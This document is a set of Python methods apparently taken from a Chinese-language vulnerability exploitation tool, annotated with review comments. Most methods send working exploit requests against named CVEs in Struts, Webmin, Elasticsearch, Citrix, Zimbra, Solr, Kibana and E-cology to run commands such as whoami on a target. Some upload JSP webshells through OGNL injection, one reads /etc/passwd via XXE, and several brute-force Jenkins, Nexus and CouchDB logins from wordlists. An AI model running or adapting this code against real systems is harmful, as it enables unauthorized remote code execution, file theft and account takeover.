Example #1
 def run(self) -> bool:
     """Check the target for CVE-2019-15107 and print the outcome.

     Two POSTs go to ``/password_change.cgi`` under ``self.url``: a check
     request whose reply must contain ``self.capta``, then a command request
     whose output is pulled out of the error banner with a regex.

     :return: True when the marker was found, False otherwise -- including
         on any exception, which is printed and swallowed.
     """
     try:
         # self.url is rewritten in place (side effect on the instance). The
         # second startswith() is redundant: "https..." already starts with "http".
         if not self.url.startswith("http") and not self.url.startswith(
                 "https"):
             self.url = "http://" + self.url
         vuln_url = self.url + "/password_change.cgi"
         # `request` is presumably an alias of the requests module (imported
         # outside this view) -- confirm.
         check_req = request.post(url=vuln_url,
                                  headers=self.headers,
                                  data=self.check_payload)
         # `" " in check_req.text` holds for nearly any HTML body and adds no
         # real discrimination; self.capta is the actual signal.
         if check_req.status_code == 200 and " " in check_req.text and self.capta in check_req.text:
             cmd_req = request.post(url=vuln_url,
                                    headers=self.headers,
                                    data=self.cmd_payload)
             pattern = re.compile(
                 r"<center><h3>Failed to change password : The current password is incorrect(.*)</h3></center>",
                 re.DOTALL)
             # [0] raises IndexError when the banner is absent; caught below.
             cmd_result = pattern.findall(cmd_req.text)[0]
             print("存在CVE-2019-15107 任意代码执行漏洞,执行whoami命令结果是:", cmd_result)
             return True
         else:
             print("不存在CVE-2019-15107 任意代码执行漏洞")
             return False
     except Exception as e:
         # Network errors and parse misses are indistinguishable from a
         # genuine negative: both print and return False.
         print(e)
         return False
         pass  # unreachable: follows the return above
Example #2
 def run(self) -> bool:
     """Check the target for S2-048 and print the outcome.

     ``self.url`` is normalised in place (scheme prefix and a default
     ``.action`` path), the check request is sent and, when ``self.capta``
     appears in the reply, a second request is sent and its output is
     extracted with a regex.

     :return: True on a positive match, False otherwise or on any exception
         (printed, not re-raised).
     """
     # Redundant second test: "https..." already starts with "http".
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     # Substring test: any URL already containing ".action" is left as is.
     if '.action' not in self.url:
         self.url = self.url + '/integration/saveGangster.action'
     try:
         check_req = request.post(self.url,
                                  headers=self.headers,
                                  data=self.check_data)
         # Unlike most sibling run() methods, the status code is not checked.
         if self.capta in check_req.text:
             cmd_req = request.post(self.url,
                                    headers=self.headers,
                                    data=self.cmd_data)
             # Newlines are removed so the non-DOTALL regex can span lines.
             cmd_str = re.sub('\n', '', cmd_req.text)
             result = re.findall('Gangster (.*?) added successfully',
                                 cmd_str)
             print('存在S2-048漏洞,执行whoami命令成功,其结果为:', result)
             return True
         else:
             print('不存在S2-048漏洞')
             return False
     except Exception as e:
         # Errors are reported as a negative result.
         print(e)
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #3
 def run(self) -> bool:
     """Check the target for S2-052 and print the outcome.

     Sends ``self.check_payload`` to ``self.url``, then fetches
     ``/check.txt`` from a rebuilt ``http://host:port`` base and looks for
     ``self.capta`` in it. On a hit the command payload is sent and
     ``/cmd.txt`` is fetched and printed.

     :return: True on a hit, False otherwise or on any exception (printed,
         not re-raised).
     """
     # Redundant second test: "https..." already starts with "http".
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     try:
         check_req = request.post(self.url,
                                  headers=self.headers,
                                  data=self.check_payload)
         # check_req is never inspected; only the request's side effect matters.
         hostname = urlparse(self.url).hostname
         port = urlparse(self.url).port
         # NOTE(review): urlparse().port is None when no port is explicit, which
         # yields "http://host:None"; the scheme is also forced to http here.
         url = 'http://' + str(hostname) + ':' + str(port)
         check_req1 = request.get(url + '/check.txt', headers=self.headers)
         if check_req1.status_code == 200 and self.capta in check_req1.text:
             cmd_req = request.post(self.url,
                                    headers=self.headers,
                                    data=self.cmd_payload)
             cmd_req1 = request.get(url + '/cmd.txt', headers=self.headers)
             print('存在S2-052漏洞,执行whoami的结果为:', cmd_req1.text)
             return True
         else:
             # Negative path prints nothing, unlike the sibling run() methods.
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #4
 def run(self) -> bool:
     """Check the target for S2-001 and print the outcome.

     Sends ``self.check_data``, reads the ``password`` input's value from
     the HTML with a regex and compares it to ``'80147'``; on a match the
     command payload is sent and the raw reply body is printed.

     :return: True on a match, and also True on the "not vulnerable"
         branch (see note below); False only when an exception occurs.
     """
     # Redundant second test: "https..." already starts with "http".
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     try:
         check_req = request.post(self.url,
                                  headers=self.headers,
                                  data=self.check_data)
         check_pattern = re.compile('<.*?name="password" value="(.*?)" ')
         check_result = check_pattern.findall(check_req.text)
         # [0] raises IndexError when the regex does not match; caught below.
         if check_result[0] == '80147':
             print('存在S2-001漏洞,执行id命令结果为:\n')
             cmd_req = request.post(self.url,
                                    headers=self.headers,
                                    data=self.cmd_data)
             print(cmd_req.text)
             return True
         else:
             print('不存在S2-001漏洞')
             # NOTE(review): returns True even though the message says "not
             # vulnerable"; every sibling run() returns False here, so callers
             # cannot tell the two outcomes apart.
             return True
     except Exception as e:
         print(e)
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #5
 def run(self) -> "bool | None":
     """Check the target for S2-053 and print the outcome.

     After normalising ``self.url`` (scheme and a default ``/hello.action``
     path) the check payload is sent; if ``self.check_count`` reports the
     ``OS:Linux`` or ``OS:Windows`` marker exactly twice, the command
     payload is sent and its output is printed.

     :return: True on a hit, False on a non-200 reply or an exception; None
         when the reply is 200 but neither marker count is 2 (falls through
         without a return).
     """
     # Redundant second test: "https..." already starts with "http".
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     if '.action' not in self.url:
         self.url = self.url + '/hello.action'
     try:
         check_req = request.post(self.url,
                                  headers=self.headers,
                                  data=self.check_payload)
         # Prints an empty line only.
         print()
         if check_req.status_code == 200:
             # self.check_count presumably counts substring occurrences --
             # defined outside this view, confirm.
             if self.check_count(check_req.text, 'OS:Linux') == 2:
                 cmd_req = request.post(self.url,
                                        headers=self.headers,
                                        data=self.cmd_payload)
                 cmd_str = re.sub('\n', '', cmd_req.text)
                 result = re.findall('<p>Your url:(.*?)</p>', cmd_str)
                 print('存在S2-053漏洞,OS为Linux,执行whoami命令成功,其结果为:', result)
                 return True
             if self.check_count(check_req.text, 'OS:Windows') == 2:
                 cmd_req = request.post(self.url,
                                        headers=self.headers,
                                        data=self.cmd_payload)
                 cmd_str = re.sub('\n', '', cmd_req.text)
                 result = re.findall('<p>Your url:(.*?)</p>', cmd_str)
                 print('存在S2-053漏洞,OS为Windows,执行whoami命令成功,其结果为:', result)
                 return True
             # Neither branch taken: implicit None is returned.
         else:
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #6
 def run(self) -> bool:
     """Check the target for CVE-2015-1427 and print the outcome.

     Posts ``self.data_payload`` to ``/website/blog/``, then the JSON check
     payload to ``/_search?pretty`` and looks for ``self.capta`` at a fixed
     path inside the JSON reply; on a hit the command payload is sent and
     the same JSON path of its reply is printed.

     :return: True on a hit, False otherwise or on any exception (printed,
         not re-raised).
     """
     try:
         # Redundant second test: "https..." already starts with "http".
         if not self.url.startswith("http") and not self.url.startswith(
                 "https"):
             self.url = "http://" + self.url
         # data_req is never inspected; the request is made for its side effect.
         data_req = request.post(self.url + '/website/blog/',
                                 data=json.dumps(self.data_payload),
                                 headers=self.headers)
         check_req = request.post(self.url + '/_search?pretty',
                                  data=json.dumps(self.check_payload),
                                  headers=self.headers)
         # Any missing key/index in the JSON path raises and lands in the
         # except branch below.
         if check_req.status_code == 200 and self.capta in json.loads(
                 check_req.text)["hits"]["hits"][0]["fields"]["lupin"][0]:
             print('存在CVE-2015-1427漏洞')
             cmd_req = request.post(self.url + '/_search?pretty',
                                    data=json.dumps(self.cmd_payload),
                                    headers=self.headers)
             print(
                 '执行whoami命令结果为:',
                 json.loads(
                     cmd_req.text)["hits"]["hits"][0]["fields"]["lupin"][0])
             return True
         else:
             print('不存在CVE-2015-1427漏洞')
             return False
     except Exception as e:
         print(e)
         print('不存在CVE-2015-1427漏洞')
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #7
 def run(self) -> bool:
     """Try every username/password pair from the wordlists against
     ``/j_acegi_security_check`` and report the first accepted pair.

     One POST is made per (user, pwd) combination, so the request count is
     the product of the two wordlist sizes. A 302 reply whose
     ``Set-Cookie`` header lacks ``ACEGI_SECURITY_HASHED`` is treated as a
     successful login.

     :return: True as soon as a pair is accepted, False after the lists are
         exhausted. Per-request exceptions are printed and the loop goes on.
     """
     # Redundant second test: "https..." already starts with "http".
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     url = self.url + "/j_acegi_security_check"
     # NOTE(review): both files are opened without a context manager and never
     # closed; the password file is re-opened once per username.
     for user in open('app/username.txt', 'r',
                      encoding='utf-8').readlines():
         user = user.strip()
         for pwd in open('app/password.txt', 'r',
                         encoding='utf-8').readlines():
             # readlines() never yields '', so this guard is always true.
             if pwd != '':
                 pwd = pwd.strip()
             data = {
                 'j_username': user,
                 'j_password': pwd,
                 'from': '',
                 'Submit': 'Sign in'
             }
             try:
                 req = request.post(url, headers=self.headers, data=data)
                 # A missing Set-Cookie header raises KeyError -> printed below.
                 if req.status_code == 302 and 'ACEGI_SECURITY_HASHED' not in req.headers[
                         'Set-Cookie']:
                     result = "user: %s pwd: %s" % (user, pwd)
                     print('存在Jenkins弱口令漏洞,弱口令为', result)
                     return True
             except Exception as e:
                 print(e)
             finally:
                 pass  # no-op
     print('不存在Jenkins弱口令漏洞')
     return False
Example #8
    def update_queryresponsewriter(self, core_name_url: str) -> None:
        """POST a config-API JSON body to ``core_name_url`` and, on a 200
        reply containing ``responseHeader``, hand a derived URL to
        ``self.send_exp``.

        :param core_name_url: URL the JSON body is posted to; its last seven
            characters are stripped to build the URL passed on to send_exp
            (presumably a ``/config`` suffix -- confirm against the caller).
        :return: None. Failures and exceptions print a message only.
        """
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
            'Content-Type': 'application/json'
        }
        # Sent verbatim as the request body (leading whitespace included).
        payload = '''
        {
        "update-queryresponsewriter": {

            "startup": "lazy",
            "name": "velocity",
            "class": "solr.VelocityResponseWriter",
            "template.base.dir": "",
            "solr.resource.loader.enabled": "true",
            "params.resource.loader.enabled": "true"
        }
        }'''
        try:
            req = request.post(core_name_url, headers=headers, data=payload)
            if req.status_code == 200 and 'responseHeader' in req.text:
                # Drop the trailing 7 characters of the URL.
                exp_url = core_name_url[:-7]
                self.send_exp(exp_url)
            else:
                print("不存在Solr远程代码执行漏洞")
        except Exception as e:
            print(e)
            print("不存在Solr远程代码执行漏洞")
        finally:
            pass  # no-op; nothing to clean up
Example #9
 def run(self) -> "bool | None":
     """Check the target for the Axis issue and print the outcome.

     A GET (with a body) to ``/services/AdminService`` is inspected for a
     200 status and the ``processing</Admin>`` marker; on a hit a POST goes
     to ``/services/RandomService`` and a follow-up GET looks for
     ``self.capta`` in the reply.

     :return: None on both the positive and the negative path (no return
         statement there); False only when an exception occurs.
     """
     # Redundant second test: "https..." already starts with "http".
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     try:
         # A GET carrying a request body -- unusual; kept as written.
         check_req = request.get(self.url + "/services/AdminService",
                                 headers=self.check_headers,
                                 data=self.check_payload)
         if check_req.status_code == 200 and "processing</Admin>" in check_req.text:
             print("存在Axis漏洞")
             # shell__req is never inspected.
             shell__req = request.post(self.url + "/services/RandomService",
                                       data=self.shell_payload,
                                       headers=self.shell_headers)
             # Note the missing "/" between self.url and "../shell.jsp".
             cmd_req = request.get(self.url + "../shell.jsp?c=echo%20" +
                                   self.capta,
                                   headers=self.headers)
             if cmd_req.status_code == 200 and self.capta in cmd_req.text:
                 print("上传的jsp文件路径为:", self.url + "../shell.jsp")
         else:
             print("不存在Axis漏洞!")
     except Exception as e:
         print(e)
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #10
 def run(self) -> bool:
     """Try every username/password pair from the wordlists against
     ``/service/rapture/session`` and report the first accepted pair.

     Credentials are base64-encoded before being posted. A 204 or 405 reply
     is treated as success. One POST is made per (user, pwd) pair, so the
     request count is the product of the two wordlist sizes.

     :return: True on the first accepted pair, False once the lists are
         exhausted. Per-request exceptions are printed and the loop goes on.
     """
     # Redundant second test: "https..." already starts with "http".
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     url = self.url + "/service/rapture/session"
     # NOTE(review): both files are opened without a context manager and never
     # closed; the password file is re-opened once per username.
     for user in open('app/username.txt', 'r',
                      encoding='utf-8').readlines():
         user = user.strip()
         for pwd in open('app/password.txt', 'r',
                         encoding='utf-8').readlines():
             # readlines() never yields '', so this guard is always true.
             if pwd != '':
                 pwd = pwd.strip()
             data = {
                 'username': base64.b64encode(user.encode()).decode(),
                 'password': base64.b64encode(pwd.encode()).decode()
             }
             try:
                 req = request.post(url, headers=self.headers, data=data)
                 # 405 counting as success is surprising -- confirm intent.
                 if req.status_code == 204 or req.status_code == 405:
                     result = "user: %s pwd: %s" % (user, pwd)
                     print('存在Nexus弱口令漏洞,弱口令为', result)
                     return True
             except Exception as e:
                 print(e)
             finally:
                 pass  # no-op
     print('不存在Nexus弱口令漏洞')
     return False
Example #11
 def execute_cmd(self, command) -> "str | bool":
     """Run ``command`` through a previously uploaded jar and return its
     output.

     ``self.check_jar_exsits`` is consulted first; if no jar is present,
     ``self.upload_execute_jar`` is called and the check repeated. The jar
     is deleted via ``self.delete_exists_jar`` right after the run request,
     before the reply is examined.

     :param command: interpolated with ``%s`` into both the URL query string
         and the JSON body.
     :return: the text between the first ``|@|`` pair minus its last two
         characters, ``"result is blank"`` when that text is empty, or False
         when no jar is available, no marker is found, or an exception occurs.
     """
     headers = {
         'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0 Safari/537.36',
         'Content-Type': 'application/json;charset=utf-8',
     }
     jar_hash_name = self.check_jar_exsits()
     data = r'{"entryClass":"Execute","parallelism":null,"programArgs":"\"%s\"","savepointPath":null,"allowNonRestoredState":null}' % command
     if jar_hash_name:
         execute_cmd_url = self.url + '/jars/' + jar_hash_name + '/run?entry-class=Execute&program-args="%s"' % command
     else:
         self.upload_execute_jar()
         jar_hash_name = self.check_jar_exsits()
         if jar_hash_name:
             execute_cmd_url = self.url + '/jars/'+ jar_hash_name + '/run?entry-class=Execute&program-args="%s"' % command
         else:
             return False
     try:
         r1 = request.post(execute_cmd_url, headers = headers, data = data)
         # Non-raw pattern: "\|" survives as a literal backslash-pipe for re.
         match = re.findall('\|@\|(.*?)\|@\|', r1.text)
         # Cleanup happens before the result is inspected.
         self.delete_exists_jar(jar_hash_name)
         if match:
             # Drops the trailing two characters of the captured text.
             if match[0][:-2]:
                 return match[0][:-2]
             else:
                 return "result is blank"
         else:
             print('不存在任意Jar包上传导致远程代码执行漏洞')
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #12
 def run(self) -> bool:
     """Check the target for CVE-2019-19781 and print the outcome.

     Builds a request to ``/vpn/../vpns/portal/scripts/newbm.pl`` with a
     ``url=...&title=...&desc=...`` body and looks for
     ``parent.window.ns_reload`` in a 200 reply.

     :return: True on a hit, False otherwise or on any exception (printed,
         not re-raised). See the notes below: as written, several lines in
         this body raise before a result can be reported.
     """
     # Redundant second test: "https..." already starts with "http".
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     try:
         newbm_url = self.url + '/vpn/../vpns/portal/scripts/newbm.pl'
         headers = {
             'User-Agent':
             'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
             'Connection': 'close',
             # NOTE(review): the '******' literal appears redacted. It has no
             # %-conversion, so `'******' % self.cdl` raises TypeError ("not all
             # arguments converted") unless self.cdl is an empty tuple.
             'NSC_USER':
             '******' % self.cdl,
             'NSC_NONCE': 'nsroot'
         }
         payload = "url=http://example.com&title=" + self.cdl + "&desc=[% template.new('BLOCK' = 'print `" + self.cmd + "`') %]"
         req = request.post(url=newbm_url, headers=headers, data=payload)
         # If `request` is requests, req.content is bytes and a str-in-bytes
         # test raises TypeError -- confirm.
         if req.status_code == 200 and 'parent.window.ns_reload' in req.content:
             print('存在CVE-2019-19781漏洞,上传的文件为:', newbm_url)
             # NOTE(review): url, cdl and cmd are not bound in this method;
             # unless they exist as module globals this raises NameError.
             self.xml_url(url, cdl, cmd)
             return True
         else:
             print('不存在CVE-2019-19781漏洞')
             return False
     except Exception as e:
         # Every error above ends here, so the method prints "not vulnerable".
         print(e)
         print('不存在CVE-2019-19781漏洞')
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #13
 def run(self) -> bool:
     """Try four servlet paths with three body variants each and report
     whether any combination looks exploitable.

     A 200 reply whose body contains none of ``;</script>``, ``Login.jsp``
     or ``Error`` is taken as a hit. Up to 12 POSTs are made per target.

     :return: True on the first hit, False after all combinations fail.
         Exceptions are swallowed silently (the print is commented out).
     """
     Url_Payload1 = "/bsh.servlet.BshServlet"
     Url_Payload2 = "/weaver/bsh.servlet.BshServlet"
     Url_Payload3 = "/weaveroa/bsh.servlet.BshServlet"
     Url_Payload4 = "/oa/bsh.servlet.BshServlet"
     Data_Payload1 = """bsh.script=exec("whoami");&bsh.servlet.output=raw"""
     Data_Payload2 = """bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw"""
     Data_Payload3 = """bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami"""
     # No scheme normalisation here, unlike the sibling run() methods.
     for Url_Payload in (Url_Payload1, Url_Payload2, Url_Payload3,
                         Url_Payload4):
         url = self.url + Url_Payload
         for Data_payload in (Data_Payload1, Data_Payload2, Data_Payload3):
             try:
                 http_response = request.post(url,
                                              data=Data_payload,
                                              headers=self.headers)
                 #print http_response.status_code
                 if http_response.status_code == 200:
                     # If `request` is requests, .content is bytes and these
                     # str-in-bytes tests raise TypeError (swallowed below).
                     if ";</script>" not in (http_response.content):
                         if "Login.jsp" not in (http_response.content):
                             if "Error" not in (http_response.content):
                                 print("存在E-cologyOA_RCE Vulnerability")
                                 #print("Server Current Username:{0}".format(http_response.content))
                                 return True
             except Exception as e:
                 #print(e)
                 pass  # silently ignored; next combination
     print("不存在E-cologyOA_RCE Vulnerability")
     return False
Example #14
    def run(self) -> "bool | tuple[bool, str]":
        """Execute the command payload once ``self.check`` reports a hit.

        :return: True when the command request returns 200, False when it
            does not or an exception occurs. When ``self.check`` is false the
            method returns a ``(False, message)`` tuple instead of a bool --
            callers testing ``if not result`` will treat that tuple as truthy.
        """
        try:
            if self.check():
                cmd_req = request.post(self.payload_url,
                                       headers=self.headers,
                                       data=self.cmd_payload)
                if cmd_req.status_code == 200:
                    print('存在CVE_2019_16759_Bypass 漏洞,执行whoami命令结果为:',
                          cmd_req.text.strip())
                    return True
                else:
                    return False
            else:
                # NOTE(review): inconsistent return type (tuple, not bool).
                return False, '不存在Bypass CVE-2019-16759漏洞'
        except Exception as e:
            print(e)
            return False
        finally:
            pass  # no-op; nothing to clean up
Example #15
    def run(self) -> bool:
        """Check whether the target responds to the check payload.

        ``self.url`` is normalised in place (scheme prefix and a default
        ``/user.action`` path) and ``self.check_payload`` is posted to it
        without custom headers.

        :return: True when the reply is 200 and contains ``self.capta``,
            False otherwise or on any exception (printed, not re-raised).
        """

        try:
            # Redundant second test: "https..." already starts with "http".
            if not self.url.startswith("http") and not self.url.startswith(
                    "https"):
                self.url = "http://" + self.url
            if '.action' not in self.url:
                self.url = self.url + '/user.action'
            check_req = request.post(self.url, data=self.check_payload)
            if self.capta in check_req.text and check_req.status_code == 200:
                return True
            else:
                return False
        except Exception as e:
            print(e)
            return False
        finally:
            pass  # no-op; nothing to clean up
Example #16
    def run(self) -> bool:
        """Check whether the target echoes the S2-001 marker.

        Posts ``self.check_data`` and reads the ``password`` input's value
        from the HTML with a regex.

        :return: True when that value equals ``'80147'``, False otherwise or
            on any exception (a missing match raises IndexError, which is
            printed and turned into False).
        """

        # Redundant second test: "https..." already starts with "http".
        if not self.url.startswith("http") and not self.url.startswith(
                "https"):
            self.url = "http://" + self.url
        try:
            check_req = request.post(self.url,
                                     headers=self.headers,
                                     data=self.check_data)
            check_pattern = re.compile('<.*?name="password" value="(.*?)" ')
            check_result = check_pattern.findall(check_req.text)
            if check_result[0] == '80147':
                return True
            else:
                return False
        except Exception as e:
            print(e)
            return False
        finally:
            pass  # no-op; nothing to clean up
Example #17
 def run(self) -> bool:
     """Check the target for CVE-2019-9670 and print the outcome.

     Posts an XML document with an external entity declaration to
     ``/Autodiscover/Autodiscover.xml`` and looks for the fixed error
     string ``Error 503 Requested response schema not available`` in the
     reply; the status code is not checked.

     :return: True when the string is present, False otherwise or on any
         exception (the exception itself is not printed).
     """
     # Redundant second test: "https..." already starts with "http".
     if not self.url.startswith("http") and not self.url.startswith("https"):
         self.url = "http://" + self.url
     data = """<!DOCTYPE xxe [
     <!ELEMENT name ANY >
     <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
      <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
         <Request>
           <EMailAddress>aaaaa</EMailAddress>
           <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
         </Request>
       </Autodiscover>
     """
     try:
         req = request.post(self.url + '/Autodiscover/Autodiscover.xml', headers = self.headers, data = data)
         if 'Error 503 Requested response schema not available' in req.text:
             print('存在CVE-2019-9670 XXE读取漏洞')
             return True
         else:
             print('不存在CVE-2019-9670 XXE读取漏洞')
             return False
     except Exception as e:
         #print(e)
         # Errors are reported as "not vulnerable" without showing the cause.
         print('不存在CVE-2019-9670 XXE读取漏洞')
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #18
 def run(self) -> bool:
     """Try every username/password pair from the wordlists against
     ``/_session`` and report the first accepted pair.

     A 200 reply with ``AuthSession`` in ``Set-Cookie`` and ``"ok": true``
     in the JSON body counts as success. One POST is made per (user, pwd)
     pair, so the request count is the product of the two wordlist sizes.

     :return: True on the first accepted pair, False once the lists are
         exhausted. Per-request exceptions are printed and the loop goes on.
     """
     # Redundant second test: "https..." already starts with "http".
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     url = self.url + "/_session"
     # NOTE(review): both files are opened without a context manager and never
     # closed; the password file is re-opened once per username.
     for user in open('app/username.txt', 'r',
                      encoding='utf-8').readlines():
         user = user.strip()
         for pwd in open('app/password.txt', 'r',
                         encoding='utf-8').readlines():
             # readlines() never yields '', so this guard is always true.
             if pwd != '':
                 pwd = pwd.strip()
             data = {'name': user, 'password': pwd}
             try:
                 req = request.post(url, headers=self.headers, data=data)
                 # A missing Set-Cookie header or non-JSON body raises and is
                 # printed below; `== True` could be a plain truthiness test.
                 if req.status_code == 200 and 'AuthSession' in req.headers[
                         'Set-Cookie'] and json.loads(
                             req.text)['ok'] == True:
                     result = "user: %s pwd: %s" % (user, pwd)
                     print('存在CouchDB弱口令漏洞,弱口令为', result)
                     return True
             except Exception as e:
                 print(e)
     print('不存在CouchDB弱口令漏洞')
     return False
Example #19
    def upload_jspshell(self, url: str, path: str) -> "str | None":
        """Append an OGNL expression to ``url`` and POST ``self.jsp_payload``
        to it, reporting where the file is expected to land.

        :param url: base URL; the query payload is appended to a local copy.
        :param path: server-side directory used inside the expression (note
            the doubled slash in ``path + '/' + '/test.jsp'``).
        :return: None when the reply contains no ``<html`` (treated as
            success and printed), the literal ``'Fail.....>_<'`` otherwise,
            or ``str(e)`` when an exception occurs.
        """

        webshellpath = "'" + path + '/' + "/test.jsp" + "'"
        Headers = {
            'ACCEPT':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'User-Agent': 'Mozilla/5.0 (compatible; Indy Library)'
        }
        payload = "?redirect:${%23path%3d"
        payload += webshellpath
        payload += ",%23file%3dnew+java.io.File(%23path),%23file.createNewFile(),%23buf%3dnew+char[50000],%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getReader().read(%23buf),%23out%3dnew+java.io.BufferedWriter(new+java.io.FileWriter(%23file)),%23str%3dnew+java.lang.String(%23buf),%23out.write(%23str.trim()),%23out.close(),%23stm%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23stm.getWriter().println("
        payload += '"' + path + '/test.jsp' + '+Get Shell!!!"'
        payload += "),%23stm.getWriter().flush(),%23stm.getWriter().close()}"
        url += payload
        try:
            req = request.post(url, data=self.jsp_payload, headers=Headers)
            # Absence of "<html" is the only success signal; no status check.
            if req.text.find('<html') == -1:
                # Rebuilds scheme://host from self.url by splitting on "/".
                print(
                    '上传webshell文件成功,webshell文件路径为:',
                    self.url.split('/')[0] + '//' + self.url.split('/')[2] +
                    '/test.jsp')
                # Falls through: success returns None.
            else:
                return 'Fail.....>_<'

        except Exception as e:
            return str(e)
Example #20
 def run(self) -> bool:
     """Check the target for CVE-2019-7609 and print the outcome.

     Fetches the version via ``self.get_kibana_version`` and bails out
     early unless ``self.version_compare("6.6.1", self.version)`` holds;
     then posts a timelion expression to ``/api/timelion/run`` and treats a
     200 JSON reply containing ``"seriesList"`` as a hit.

     :return: True on a hit, False on a version mismatch, a negative reply,
         or any exception (printed, not re-raised).
     """
     # Redundant second test: "https..." already starts with "http".
     if not self.url.startswith("http") and not self.url.startswith("https"):
         self.url = "http://" + self.url
     # Populates self.version -- defined outside this view.
     self.get_kibana_version()
     # '9.9.9' presumably marks an unknown version -- confirm in get_kibana_version.
     if self.version == '9.9.9' or not self.version_compare("6.6.1", self.version):
         return False
     headers = {
         'Content-Type': 'application/json;charset=utf-8',
         'Referer': self.url,
         'kbn-version': self.version,
         'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0',
     }
     data = '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}'
     try:
         r = request.post(self.url + "/api/timelion/run", data = data, headers = headers)
         if r.status_code == 200 and 'application/json' in r.headers.get('content-type', '') and '"seriesList"' in r.text:
             print("存在CVE-2019-7609漏洞")
             #self.reverse_shell('127.0.0.1', '10000')
             return True
         else:
             print("不存在CVE-2019-7609漏洞")
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #21
 def run(self) -> bool:
     """Check the target for CVE-2020-7980 and print the outcome.

     Posts ``self.data`` as JSON to ``/cgi-bin/libagent.cgi`` with a
     ``type=J&<epoch-seconds>000`` query string and fixed ``ctr_t`` /
     ``sid`` cookies; a 200 reply containing ``self.capta`` is a hit, and
     the second-to-last whitespace-separated token of the body is printed.

     :return: True on a hit, False otherwise or on any exception (printed,
         not re-raised).
     """
     try:
         # Redundant second test: "https..." already starts with "http".
         if not self.url.startswith("http") and not self.url.startswith(
                 "https"):
             self.url = "http://" + self.url
         # Current UTC epoch seconds with "000" appended.
         cmd_request = request.post(
             self.url + '/cgi-bin/libagent.cgi?type=J&' +
             str(calendar.timegm(time.gmtime())) + '000',
             json=self.data,
             cookies={
                 'ctr_t': '0',
                 'sid': '123456789'
             })
         if cmd_request.status_code == 200 and self.capta in cmd_request.text:
             # IndexError on a body with fewer than two tokens -> except branch.
             result = cmd_request.text.split()[-2].replace('},', '')
             print("存在CVE-2020-7980漏洞,执行结果为:", result)
             return True
         else:
             print("不存在CVE-2020-7980漏洞")
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #22
 def run(self) -> bool:
     """Check the target for S2-046 and print the outcome.

     Posts ``self.check_data`` to ``self.url``; when ``self.capta`` is in
     the reply (no status check), ``self.cmd_data`` is posted and the raw
     reply body is printed.

     :return: True on a hit, False otherwise or on any exception (printed,
         not re-raised).
     """
     # Redundant second test: "https..." already starts with "http".
     if not self.url.startswith("http") and not self.url.startswith("https"):
         self.url = "http://" + self.url
     try:
         check_req = request.post(self.url, headers = self.headers, data = self.check_data)
         if self.capta in check_req.text:
             cmd_req = request.post(self.url, headers = self.headers, data = self.cmd_data)
             print('存在S2-046漏洞,执行whoami命令成功,结果为:', cmd_req.text)
             return True
         else:
             print('不存在S2-046漏洞!')
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #23
 def run(self) -> bool:
     """Check the target for CVE-2019-16759 and print the outcome.

     Posts ``self.check_data`` (no headers) to ``self.url``; a 200 reply
     containing ``self.capta`` triggers a second POST with ``self.cmd_data``
     whose raw body is printed.

     :return: True on a hit, False otherwise or on an exception inside the
         try block (printed, not re-raised).
     """
     # Redundant second test: "https..." already starts with "http".
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     # NOTE(review): this request is outside the try, so a connection error
     # here propagates to the caller instead of returning False.
     check_req = request.post(self.url, data=self.check_data)
     try:
         if check_req.status_code == 200 and self.capta in check_req.text:
             cmd_req = request.post(self.url, data=self.cmd_data)
             print('CVE-2019-16759漏洞,执行whoami命令成功,执行结果为:', cmd_req.text)
             return True
         else:
             # Negative path prints nothing.
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #24
 def run(self) -> bool:
     """Check the target for the Tongda OA upload/command issue and print
     the outcome.

